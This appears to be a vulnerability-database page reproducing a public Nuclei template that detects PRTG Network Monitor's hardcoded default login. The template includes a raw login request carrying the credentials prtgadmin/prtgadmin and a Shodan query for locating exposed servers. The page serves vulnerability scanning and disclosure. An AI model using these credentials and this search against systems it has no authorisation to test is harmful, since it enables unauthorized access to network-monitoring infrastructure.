prtg-default-login: PRTG Network Monitor - Hardcoded Credentials

日期: 2025-08-01 | 影响软件: PRTG Network Monitor | POC: 已公开

漏洞描述

PRTG Network Monitor contains a hardcoded credential vulnerability. An attacker can obtain access to user accounts and access sensitive information, modify data, and/or execute unauthorized operations.

PoC代码[已公开]

id: prtg-default-login

info:
  name: PRTG Network Monitor - Hardcoded Credentials
  author: johnk3r
  severity: high
  description: PRTG Network Monitor contains a hardcoded credential vulnerability. An attacker can obtain access to user accounts and access sensitive information, modify data, and/or execute unauthorized operations.
  reference:
    - https://www.paessler.com/manuals/prtg/login
  classification:
    cwe-id: CWE-798
    cpe: cpe:2.3:a:paessler:prtg_network_monitor:*:*:*:*:*:*:*:*
  metadata:
    max-request: 1
    shodan-query: http.favicon.hash:-655683626
    product: prtg_network_monitor
    vendor: paessler
  tags: prtg,default-login,vuln

http:
  - raw:
      - |
        POST /public/checklogin.htm HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

        loginurl=&username={{username}}&password={{password}}

    attack: pitchfork
    payloads:
      username:
        - prtgadmin
      password:
        - prtgadmin

    matchers-condition: and
    matchers:
      - type: word
        part: header
        words:
          - "OCTOPUS"
          - "/home"
        condition: and

      - type: status
        status:
          - 302
# digest: 4a0a004730450220473987a736a6dcee95a86fd0ef6356bb6bccba40bde9b152968c6ac678ee55d5022100d7cdadca38a302563c4c1d4678fc5535ccfa03faecaaba0cc405782a4f711004:922c64590222798bb761d5b6d8e72950
来源: https://github.com/projectdiscovery/nuclei-templates/blob/main/http/default-logins/prtg/prtg-default-login.yaml

相关漏洞推荐